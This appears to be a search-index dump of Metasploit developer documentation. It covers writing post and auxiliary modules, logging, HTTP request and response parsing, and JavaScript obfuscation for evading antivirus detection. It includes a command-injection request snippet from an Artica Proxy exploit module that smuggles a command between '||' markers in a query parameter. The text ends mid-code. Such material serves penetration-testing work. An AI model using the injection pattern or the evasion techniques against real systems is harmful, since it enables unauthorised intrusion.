    "content": "Post module development is a challenge to your programming skills. It’s not like writing a memory corruption based exploit, which, technically speaking, is usually about crafting a malicious input - a string. A post module is more about proper module design, practical knowledge in Ruby and the Metasploit library. It’s also a very valuable skill to have, because if you don’t know what to do after popping a shell, what’s the point of the penetration test, right? Also, what if a module doesn’t work? Are you willing to wait days, weeks, or maybe even months for someone else to fix it for you? Probably not. If you know how to do it yourself, you can probably fix it a lot sooner, and continue with your pentest and do more things. So learn post module development! It’s good for you, and your career. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html"
  },"249": {
    "doc": "Writing an auxiliary module",
    "title": "Plan your module",
    "content": "Just like writing software, before you start coding you should have a clear and specific goal for what your auxiliary module does. It’s never a good idea to have multiple functionalities in a single module. You should break it down into multiple modules instead. You should also think about how your module will perform in different situations. For example, if it’s meant to test against a Tomcat server, what happens if you use it against Nginx? Will it error out and leave a backtrace? If it does, you should handle that properly. Does your module require specific settings/conditions on the target machine? What happens if they aren’t met? Will it error out again? . Most importantly, make sure to test your module thoroughly. It’s always ugly to find out about problems in the middle of an important engagement, and that just might cost you. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#plan-your-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#plan-your-module"
  },"250": {
    "doc": "Writing an auxiliary module",
    "title": "Main categories of auxiliary modules",
    "content": "Generally speaking, auxiliary modules are categorized based on their behavior, but this is somewhat inconsistent so you’ll just have to use your best judgement and find the most appropriate one. Here’s a list of the common ones: . | Category | Description | . | admin | Modules that modify, operate, or manipulate something on the target machine. | . | analyze | We initially created this folder for password-cracking modules that require analysis time. | . | client | We initially created this folder for an SMTP module for social-engineering purposes. | . | dos | Pretty self-explanatory: denial-of-service modules. | . | fuzzers | If your module is a fuzzer, this is where it belongs. Make sure to place it in the correct sub-directory based on the protocol. | . | gather | Modules that gather, collect, or enumerate data from a single target. | . | scanner | Modules that use the Msf::Auxiliary::Scanner mixin almost always go here. Make sure to place yours in the correct sub-directory based on the protocol. | . | server | Modules that are servers. | . | sniffer | Modules that are sniffers. | . There are actually a few more directories in auxiliary, but that’s kind of where the gray area is. You are more than welcome to see for yourself. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#main-categories-of-auxiliary-modules",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#main-categories-of-auxiliary-modules"
  },"251": {
    "doc": "Writing an auxiliary module",
    "title": "The Msf::Auxiliary::Scanner mixin",
    "content": "The Msf::Auxiliary::Scanner mixin is heavily used in auxiliary modules, so we might as well talk about it right here. The mixin allows you to test against a range of hosts, and it’s multi-threaded. To use it, first off you need to include the mixin under the scope of your MetasploitModule class: . include Msf::Auxiliary::Scanner . A couple of new things will be added to your module when you include this mixin. You will have a new datastore option named “RHOSTS”, which allows the user to specify multiple hosts. There’s a new “THREADS” option, which sets the number of threads to run during execution. There’s also “ShowProgress” and “ShowProgressPercent” for tracking scan progress. Typically, the main method for an auxiliary module is “def run”. But when you use the Msf::Auxiliary::Scanner mixin, you need to be using def run_host(ip). The ip parameter is the target machine. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#the-msfauxiliaryscanner-mixin",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#the-msfauxiliaryscanner-mixin"
  },"252": {
    "doc": "Writing an auxiliary module",
    "title": "Templates",
    "content": "Here’s the most basic example of an auxiliary module. We’ll explain a bit more about the fields that need to be filled: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super( update_info( info, 'Name' => 'Module name', 'Description' => %q{ Say something that the user might want to know. }, 'Author' => [ 'Name' ], 'License' => MSF_LICENSE ) ) end def run # Main function end end . The Name field can begin with the vendor name, but this is optional. It is followed by the software name, and then a few words that basically describe what it’s for. For example: “Dolibarr ERP/CRM Login Utility” . The Description field should explain what the module does, things to watch out for, specific requirements; the more the better. The goal is to let the user understand what he’s using without the need to actually read the module’s source and figure things out. And trust me, most of them don’t. The Author field is where you put your name. The format should be “Name “. If you want to have your Twitter handle there, leave it as a comment, for example: “Name # handle” . Because the Msf::Auxiliary::Scanner mixin is so popular, we figured you’d want a template for it, too. And here you go: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner def initialize(info = {}) super( update_info( info, 'Name' => 'Module name', 'Description' => %q{ Say something that the user might want to know. }, 'Author' => [ 'Name' ], 'License' => MSF_LICENSE ) ) end def run_host(ip) # Main method end end . Basic git commands . 
Metasploit no longer uses svn for source code management, instead we use git, so knowing some tricks with git goes a long way. We’re not here to lecture you about how awesome git is, we know it has a learning curve and it’s not surprising to find new users making mistakes. Every once in a while, your git “rage” will kick in, and we understand. However, it’s important for you to take advantage of branching. Every time you make a module, or make some changes to existing code, you should not do so on the default master branch. Why? Because when you do a msfupdate, which is Metasploit’s utility for updating your repository, it will do a git reset before merging the changes, and all your code goes bye-bye. Another mistake people tend to make is having all the changes on master before submitting a pull request. This is a bad idea, because most likely you’re submitting other crap you don’t intend to change, and/or you’re probably asking us to merge other unnecessary commit history when there only needs to be one commit. Thanks for contributing your module to the community, but no thanks to your crazy commit history. So as a habit, when you want to make something new, or change something, begin with a new branch that’s up to date with master. First off, make sure you’re on master. If you do a git status it will tell you what branch you’re currently on: . $ git status # On branch upstream-master nothing to commit, working directory clean . Ok, now do a git pull to download the latest changes from Metasploit: . $ git pull Already up-to-date. At this point, you’re ready to start a new branch. In this case, we’ll name our new branch “my_awesome_branch”: . $ git checkout -b my_awesome_branch Switched to a new branch 'my_awesome_branch' . And then you can go ahead and add that module. Make sure it’s in the appropriate path: . $ git add [module path] . 
When you decide to save the changes, commit (if there’s only one module, you can do git commit -a too so you don’t have to type the module path. Note -a really means EVERYTHING): . $ git commit [module path] . When you’re done, push your changes, which will upload your code to your remote branch “my_awesome_branch”. You must push your changes in order to submit the pull request, or share it with others on the Internet. $ git push origin my_awesome_branch . ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#templates",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#templates"
  },"253": {
    "doc": "Writing an auxiliary module",
    "title": "References",
    "content": ". | https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary.rb | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/scanner.rb | . ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#references",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#references"
  },"254": {
    "doc": "Writing an auxiliary module",
    "title": "Writing an auxiliary module",
    "content": "Metasploit is known for its free, open-source exploits - modules that pop shells. But in reality, penetration testers rely more on auxiliary modules, and often a successful pentest can be done without firing a single exploit. They’re just more handy, and the punishment for a failed attempt is generally much lower. Professionals actually love auxiliary modules. Another interesting fact about auxiliary modules is that some of them aren’t so different from exploits. The main difference is how it’s defined in Metasploit: if a module executes a payload, it’s an exploit. If not, even though it takes advantage of a vulnerability, it still belongs to the auxiliary category. If an auxiliary module is capable of running an Operating System command, it could be made into an exploit by delivering a cmd* payload and/or using a command stager. So you see, if you’re an auxiliary module addict, you are on the right track. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html"
  },"255": {
    "doc": "Logging",
    "title": "Basic Usage",
    "content": "As a user, you should know that all the logged errors are saved in a file named framework.log. The save path is defined in Msf::Config.log_directory, which means in msfconsole, you can switch to irb and figure out where it is: . msf > irb [*] Starting IRB shell... >> Msf::Config.log_directory => \"/Users/test/.msf4/logs\" . By default, errors are logged at level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this: . msf > setg LogLevel 3 LogLevel => 3 msf > . ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#basic-usage",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#basic-usage"
  },"256": {
    "doc": "Logging",
    "title": "Log Levels",
    "content": "There are 4 different logging levels defined in log/rex/logging.rb: . | Log Level | Description | . | LEV_0 (Default) | The default log level if none is specified. It should be used when a log message should always be displayed when logging is enabled. Very few log messages should occur at this level aside from necessary information logging and error/warning logging. Debug logging at level zero is not advised. | . | LEV_1 (Extra) | This log level should be used when extra information may be needed to understand the cause of an error or warning message or to get debugging information that might give clues as to why something is happening. This log level should be used only when information may be useful to understanding the behavior of something at a basic level. This log level should not be used in an exhaustively verbose fashion. | . | LEV_2 (Verbose) | This log level should be used when verbose information may be needed to analyze the behavior of the framework. This should be the default log level for all detailed information not falling into LEV_0 or LEV_1. It is recommended that this log level be used by default if you are unsure. | . | LEV_3 (Insanity) | This log level should contain very verbose information about the behavior of the framework, such as detailed information about variable states at certain phases including, but not limited to, loop iterations, function calls, and so on. This log level will rarely be displayed, but when it is the information provided should make it easy to analyze any problem. | . For debugging purposes, it’s always better to turn on the highest level of logging. ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#log-levels",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#log-levels"
  },"257": {
    "doc": "Logging",
    "title": "Logging API",
    "content": "There are mainly five logging methods you will most likely be using a lot, and they all have the exact same arguments. Let’s use one of the logging methods to explain what these arguments are about: . def elog(msg, src = 'core', level = 0, from = caller) . | msg - The message you want to log | src - The source of the error (default is core, as in Metasploit core) | level - The log level | from - The current execution stack. caller is a method from Kernel. | . Notice that only the msg argument is required, the rest are optional. Now, let’s go over these five methods and explain how they’re meant to be used: . | Method | Purpose | . | dlog() | LOG_DEBUG | . | elog() | LOG_ERROR | . | wlog() | LOG_WARN | . | ilog() | LOG_INFO | . | rlog() | LOG_RAW | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#logging-api",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#logging-api"
  },"258": {
    "doc": "Logging",
    "title": "Code Example",
    "content": "elog(\"The sky has fallen\") . ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#code-example"
  },"259": {
    "doc": "Logging",
    "title": "Logging",
    "content": "Usually, if something in Metasploit triggers an error, there is a backtrace or at least a brief message that explains what the problem is about. Most of the time, there is nothing wrong with that. But sometimes if you wish to report that problem, you might lose that information, which makes your bug report less informative, and the problem may take much longer to solve. This is why logging to file in many cases is extremely useful. In this documentation, we’ll explain about how to take advantage of this properly. ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html"
  },"260": {
    "doc": "JavaScript Obfuscation",
    "title": "The rand_text_alpha trick",
    "content": "Using rand_text_alpha is the most basic form of evasion, but also the least effective. If this is your choice, you should randomize whatever can be randomized without breaking the code. Using the MS12-063 example above, here’s how you would use rand_text_alpha: . # Randomizes the array variable name # rand(6) + 3 gives a length between 3 and 8 var_array = rand_text_alpha(rand(6) + 3) # Randomizes the src value val_src = rand_text_alpha(1) js = %Q| var #{var_array} = new Array(); #{var_array}[0] = windows.document.createElement(\"img\"); #{var_array}[0][\"src\"] = \"#{val_src}\"; | . ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-rand_text_alpha-trick",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-rand_text_alpha-trick"
  },"261": {
    "doc": "JavaScript Obfuscation",
    "title": "The ObfuscateJS class",
    "content": "The ObfuscateJS class is like the rand_text_alpha technique on steroids, but even better. It allows you to replace symbol names such as variables, methods, classes, and namespaces. It can also obfuscate strings by either randomly using fromCharCode or unescape. And lastly, it can strip JavaScript comments, which is handy because exploits often are hard to understand and read, so you need comments to remember why something is written in a specific way, but you don’t want to show or leak those comments in a pentest. To use ObfuscateJS, let’s use the MS12-063 example again to demonstrate. If you feel like following the steps yourself without writing a module, what you can do is go ahead and run msfconsole, and then switch to irb, like this: . $ ./msfconsole -q msf > irb [*] Starting IRB shell... >> . And then you are ready to go. The first thing you do with ObfuscateJS is initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following: . js = %Q| var arrr = new Array(); arrr[0] = windows.document.createElement(\"img\"); arrr[0][\"src\"] = \"a\"; | obfu = ::Rex::Exploitation::ObfuscateJS.new(js) . obfu should return a Rex::Exploitation::ObfuscateJS object. It allows you to do a lot of things; you can really just call methods, or look at the source to see what methods are available (with additional API documentation). But for demo purposes, we’ll showcase the most common one: the obfuscate method. To actually obfuscate, you need to call the obfuscate method. This method accepts a symbols argument that allows you to manually specify what symbol names (variables, methods, classes, etc) to obfuscate. It should be in a hash like this: . { 'Variables' => [ 'var1', ... ], 'Methods' => [ 'method1', ... ], 'Namespaces' => [ 'n', ... ], 'Classes' => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ] } . 
So if I want to obfuscate the variable arrr, and I want to obfuscate the src string, here’s how: . >> obfu.obfuscate('Symbols' => {'Variables'=>['arrr']}, 'Strings' => true) => \"\\nvar QqLFS = new Array();\\nQqLFS[0] = windows.document.createElement(unescape(String.fromCharCode( 37, 54, 071, 045, 0x36, 0144, 37, 066, 067 )));\\nQqLFS[0][String.fromCharCode( 115, 0x72, 0143 )] = unescape(String.fromCharCode( 045, 0x36, 0x31 ));\\n\" . In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element’s event handler, such as this: . <html> <head> <script> function test() { alert(\"hello, world!\"); } </script> </head> <body onload=\"test();\"> </body> </html> . The obfuscated version would look like the following (note that obfuscate returns the obfuscated code, so keep its return value and embed that, not the original js string): . js = %Q| function test() { alert(\"hello, world!\"); } | obfu = ::Rex::Exploitation::ObfuscateJS.new(js) js = obfu.obfuscate('Symbols' => {'Methods'=>['test']}, 'Strings' => true) html = %Q| <html> <head> <script> #{js} </script> </head> <body onload=\"#{obfu.sym('test')}();\"> </body> </html> | puts html . ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-obfuscatejs-class",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-obfuscatejs-class"
  },"262": {
    "doc": "JavaScript Obfuscation",
    "title": "The JSObfu class",
    "content": "The JSObfu class used to be ObfuscateJS’ cousin, but it has been completely rewritten since September 2014, and packaged as a gem. The obfuscation is more complex and you can actually tell it to obfuscate multiple times. You also no longer have to manually specify what symbol names to change, it just knows. Trying JSObfu in Rex . Let’s get back to irb again to demonstrate how easy it is to use JSObfu: . $ ./msfconsole -q msf > irb [*] Starting IRB shell... >> . This time we’ll do a “hello world” example: . >> js = ::Rex::Exploitation::JSObfu.new %Q|alert('hello, world!');| => alert('hello, world!'); >> js.obfuscate => nil . And here’s the output: . window[(function () { var _d=\"t\",y=\"ler\",N=\"a\"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })()); . Like ObfuscateJS, if you need to get the randomized version of a symbol name, you can still do that. We’ll demonstrate this with the following example: . >> js = ::Rex::Exploitation::JSObfu.new %Q|function test() { alert(\"hello\"); }| => function test() { alert(\"hello\"); } >> js.obfuscate . Say we want to know the randomized version of the method name “test”: . >> puts js.sym(\"test\") _ . OK, double check right quick: . >> puts js function _(){window[(function () { var N=\"t\",r=\"r\",i=\"ale\"; return i+r+N })()](String.fromCharCode(0150,0x65,0154,0x6c,0x6f));} . Yup, that looks good to me. And finally, let’s try to obfuscate a few times to see how that goes: . 
>> js = ::Rex::Exploitation::JSObfu.new %Q|alert('hello, world!');| => alert('hello, world!'); >> js.obfuscate(:iterations=>3) => window[String[((function(){var s=(function () { var r=\"e\"; return r })(),Q=(function () { var I=\"d\",dG=\"o\"; return dG+I })(),c=String.fromCharCode(0x66,114),w=(function () { var i=\"C\",v=\"r\",f=\"omCh\",j=\"a\"; return f+j+v+i })();return c+w+Q+s;})())](('Urx'.length*((0x1*(01*(1*020+5)+1)+3)*'u'.length+('SGgdrAJ'.length-7))+(('Iac'.length*'XLR'.length+2)*'qm'.length+0)),(('l'.length*((function () { var vZ='k'; return vZ })()[((function () { var E=\"h\",t=\"t\",O=\"leng\"; return O+t+E })())]*(0x12*1+0)+'xE'.length)+'h'.length)*(function () { var Z='uA',J='tR',D='x'; return D+J+Z })()[((function () { var m=\"th\",o=\"g\",U=\"l\",Y=\"en\"; return U+Y+o+m })())]+'lLc'.length),('mQ'.length*(02*023+2)+('Tt'.length*'OEzGiMVf'.length+5)),(String.fromCharCode(0x48,0131)[((function () { var i=\"gth\",r=\"len\"; return r+i })())]*('E'.length*0x21+19)+(0x1*'XlhgGJ'.length+4)),(String.fromCharCode(0x69)[((function () { var L=\"th\",Q=\"n\",$=\"l\",I=\"g\",x=\"e\"; return $+x+Q+I+L })())]*('QC'.length*0x2b+3)+(01*26+1)))]((function(){var C=String[((function () { var w=\"rCode\",j=\"mCha\",A=\"fr\",B=\"o\"; return A+B+j+w })())]((6*0x10+15),('riHey'.length*('NHnex'.length*0x4+2)+4),(01*95+13),(1*('Z'.length*(0x1*(01*(0x3*6+5)+1)+18)+12)+46),(0x1*(01*013+6)+16)),JQ=String[((function () { var NO=\"ode\",T=\"rC\",HT=\"fromCha\"; return HT+T+NO })())](('J'.length*0x54+17),(0x2*051+26),('TFJAGR'.length*('ymYaSJtR'.length*'gv'.length+0)+12),(01*0155+2),(0xe*'FBc'.length+2),(0x1*22+10),(3*(01*043+1)+11)),g=(function(){var N=(function () { var s='h'; return s })();return N;})();return g+JQ+C;})()); . Using JSObfu for module development . When you are writing a module, you should not call Rex directly like the above examples. Instead, you should be using the #js_obfuscate method found in the JSObfu mixin. 
When you’re using JavaScript in your module, always write it like this: . # This returns a Rex::Exploitation::JSObfu object js = js_obfuscate(your_code) . Note that by default, even though your module is calling the #js_obfuscate method, obfuscation will not kick in unless the user sets the JsObfuscate datastore option. This option is an OptInt, which sets the number of times to obfuscate (default is 0). ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-jsobfu-class",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-jsobfu-class"
  },"263": {
    "doc": "JavaScript Obfuscation",
    "title": "JavaScript Obfuscation",
    "content": "Stealth is an important feature to think about during exploit development. If your exploit gets caught all the time, it doesn’t matter how awesome or how technically challenging your exploit is; it is most likely not very usable in a real penetration test. Browser exploits in particular rely heavily on JavaScript to trigger vulnerabilities, therefore a lot of antivirus or signature-based intrusion detection/prevention systems will scan the JavaScript and flag specific lines as malicious. The following code used to be flagged as MS12-063 by multiple antivirus vendors even though it is not necessarily harmful or malicious; we’ll use this as an example throughout the wiki: . var arrr = new Array(); arrr[0] = windows.document.createElement(\"img\"); arrr[0][\"src\"] = \"a\"; . To avoid getting flagged, there are some common evasive tricks we can try. For example, you can manually modify the code a little bit to make it not recognizable by any signatures. Or if the antivirus relies on cached webpages to scan for exploits, it is possible to make the browser not cache your exploit so you stay undetected. Or in this case, you can obfuscate your code, which is what this writeup will focus on. In Metasploit, there are three common ways to obfuscate your JavaScript. The first one is simply by using the rand_text_alpha method (in Rex) to randomize your variable names. The second one is by using the ObfuscateJS class. And the third option is the JSObfu class. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html"
  },"264": {
    "doc": "How to parse an HTTP response",
    "title": "Getting a response",
    "content": "To get a response, you can either use Rex::Proto::Http::Client, or the HttpClient mixin to make an HTTP request. If you are writing a module, you should use the mixin. The following is an example of using the #send_request_cgi method from HttpClient: . res = send_request_cgi({'uri'=>'/index.php'}) . The return value for res is a Rex::Proto::Http::Response object, but it’s also possible that you get nil (NilClass) due to a connection/response timeout, so check for that before using it. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-a-response",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-a-response"
  },"265": {
    "doc": "How to parse an HTTP response",
    "title": "Getting the response body",
    "content": "With a Rex::Proto::Http::Response object, here’s how you can retrieve the HTTP body: . data = res.body . If you want to get the raw HTTP response (including the response message/code, headers, body, etc), then you can simply do: . raw_res = res.to_s . However, in this documentation we are only focusing on res.body. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-the-response-body",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-the-response-body"
  },"266": {
    "doc": "How to parse an HTTP response",
    "title": "Choosing the right parser",
    "content": "| Format | Parser | . | HTML | Nokogiri | . | XML | Nokogiri | . | JSON | JSON | . If the format you need to parse isn’t on the list, then fall back to res.body. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#choosing-the-right-parser",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#choosing-the-right-parser"
  },"267": {
    "doc": "How to parse an HTTP response",
    "title": "Parsing HTML with Nokogiri",
    "content": "When you have a Rex::Proto::Http::Response with HTML in it, the method to call is: . html = res.get_html_document . This will give you a Nokogiri::HTML::Document, which allows you to use the Nokogiri API. There are two common methods in Nokogiri to find elements: #at and #search. The main difference is that the #at method will only return the first result, while #search will return all found results (in an array). Consider the following example as your HTML response: . <html> <head> <title>Hello, World!</title> </head> <body> <div class=\"greetings\"> <div id=\"english\">Hello</div> <div id=\"spanish\">Hola</div> <div id=\"french\">Bonjour</div> </div> </body> </html> . Basic usage of #at . If the #at method is used to find a DIV element: . html = res.get_html_document greeting = html.at('div') . Then the greeting variable should be a Nokogiri::XML::Element object that gives us this block of HTML (again, because the #at method only returns the first result): . <div class=\"greetings\"> <div id=\"english\">Hello</div> <div id=\"spanish\">Hola</div> <div id=\"french\">Bonjour</div> </div> . Grabbing an element from a specific element tree . html = res.get_html_document greeting = html.at('div//div') . Then the greeting variable should give us this block of HTML: . <div id=\"english\">Hello</div> . Grabbing an element with a specific attribute . Let’s say I don’t want the English Hello, I want the Spanish one. Then we can do: . html = res.get_html_document greeting = html.at('div[@id=\"spanish\"]') . Grabbing an element with a specific text . 
Let’s say I only know there’s a DIV element that says “Bonjour”, and I want to grab it, then I can do: . html = res.get_html_document greeting = html.at('//div[contains(text(), \"Bonjour\")]') . Or let’s say I don’t know what element the word “Bonjour” is in, then I can be a little vague about this: . html = res.get_html_document greeting = html.at('[text()*=\"Bonjour\"]') . Basic usage of #search . The #search method returns an array of elements. Let’s say we want to find all the DIV elements, then here’s how: . html = res.get_html_document divs = html.search('div') . Accessing text . When you have an element, you can always call the #text method to grab the text. For example: . html = res.get_html_document greeting = html.at('[text()*=\"Bonjour\"]') print_status(greeting.text) . The #text method can also be used as a trick to strip all the HTML tags: . html = res.get_html_document print_line(html.text) . The above will print: . \"\\n\\nHello, World!\\n\\n\\n\\nHello\\nHola\\nBonjour\\n\\n\\n\" . If you actually want to keep the HTML tags, then instead of calling #text, call #inner_html. Accessing attributes . With an element, simply call #attributes. Walking a DOM tree . Use the #next method to move on to the next element. Use the #previous method to roll back to the previous element. Use the #parent method to find the parent element. Use the #children method to get all the child elements. Use the #traverse method for complex parsing. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-html-with-nokogiri",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-html-with-nokogiri"
  },"268": {
    "doc": "How to parse an HTTP response",
    "title": "Parsing XML",
    "content": "To get the XML body from Rex::Proto::Http::Response, do: . xml = res.get_xml_document . The rest should be pretty similar to parsing HTML. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-xml",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-xml"
  },"269": {
    "doc": "How to parse an HTTP response",
    "title": "Parsing JSON",
    "content": "To get the JSON body from Rex::Proto::Http::Response, do: . json = res.get_json_document . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-json",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-json"
  },"270": {
    "doc": "How to parse an HTTP response",
    "title": "References",
    "content": ". | https://nokogiri.org/tutorials/parsing_an_html_xml_document.html | How to send an HTTP request using Rex Proto Http Client | How to Send an HTTP Request Using HttpClient | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#references",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#references"
  },"271": {
    "doc": "How to parse an HTTP response",
    "title": "How to parse an HTTP response",
    "content": "This document talks about how to parse an HTTP response body in the cleanest way possible. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html"
  },"272": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "There are mainly two common methods you will see:",
    "content": ". | send_request_raw - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer send_request_cgi. If you wish to learn about how this method works, look at the documentation for Rex::Proto::Http::Client#request_raw. | . Here’s a basic example of how to use send_request_raw: . send_request_raw({'uri'=>'/index.php'}) . | send_request_cgi - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this. If you wish to learn about how this method works, check out Rex::Proto::Http::Client#request_cgi. | . Here’s a very basic example for send_request_cgi: . send_request_cgi({ 'method' => 'GET', 'uri' => '/hello_world.php', 'vars_get' => { 'param_1' => 'abc', 'param_2' => '123' } }) . Please note: send_request_raw and send_request_cgi will return nil if there’s a timeout, so please make sure to account for that condition when you handle the return value. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#there-are-mainly-two-common-methods-you-will-see",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#there-are-mainly-two-common-methods-you-will-see"
  },"273": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Cookies & CookieJars",
    "content": "Part of send_request_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient’s cookie_jar variable, an instance of the HttpCookieJar class. An HttpCookieJar is a collection of HttpCookie objects. The jar can be populated manually with its add method, or automatically via the keep_cookies option that can be passed to send_request_cgi. If you need to clear the cookie jar (for instance, before a second login), try: . cookie_jar.clear . keep_cookies option . Shown below is the request used to log in to a GitLab account in the gitlab_file_read_rce exploit module: . res = @http_client.send_request_cgi({ 'method' => 'POST', 'uri' => '/users/sign_in', 'keep_cookies' => true, 'vars_post' => { 'utf8' => '✓', 'authenticity_token' => csrf_token, 'user[login]' => username, 'user[password]' => password, 'user[remember_me]' => 0 } }) . The cookies returned by the server with a successful login need to be attached to all future requests, so 'keep_cookies' => true is used to add all returned cookies to the HttpClient cookie jar and attach them to all subsequent requests. cookie option . Shown below is the request used in the artica_proxy_auth_bypass_service_cmds_peform_command_injection module. This module requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the cookie option, that string is set as the cookie header without any changes, allowing the exploit to be carried out: . res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'), 'vars_get' => { 'service-cmds-peform' => \"||#{Rex::Text.uri_encode(cmd, 'hex-all')}||\" }, 'cookie' => \"PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1\" }) . 
Any object passed to cookie that isn’t an instance of HttpCookieJar will have to_s called on it. The result of to_s will be set as the cookie header of the HTTP request. The contents of the HttpClient cookie_jar are ignored for this request only; subsequent requests are unaffected. Module authors can also pass an instance of HttpCookieJar with the cookie option: . cj = Msf::Exploit::Remote::HTTP::HttpCookieJar.new cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('PHPSESSID', @phpsessid)) cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('AsWebStatisticsCooKie', 1)) cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('shellinaboxCooKie', 1)) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'), 'vars_get' => { 'service-cmds-peform' => \"||#{Rex::Text.uri_encode(cmd, 'hex-all')}||\" }, 'cookie' => cj }) . The above code would create an identical cookie header to the one used in the previous example, save for a random ordering of the name-value pairs. This shouldn’t affect how the server reads the cookies, but it’s still worth keeping in mind if you’ve somehow found a vuln reliant on the order of cookies in a header. expire_cookies . send_request_cgi will call cleanup on cookie_jar before it is used to populate a request with cookies. cleanup will permanently remove any expired cookies from the jar, affecting all future requests. If this behaviour isn’t desired and an author would prefer to keep expired cookies in the jar, the expire_cookies option can be set to false: . res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'), 'vars_get' => { 'service-cmds-peform' => 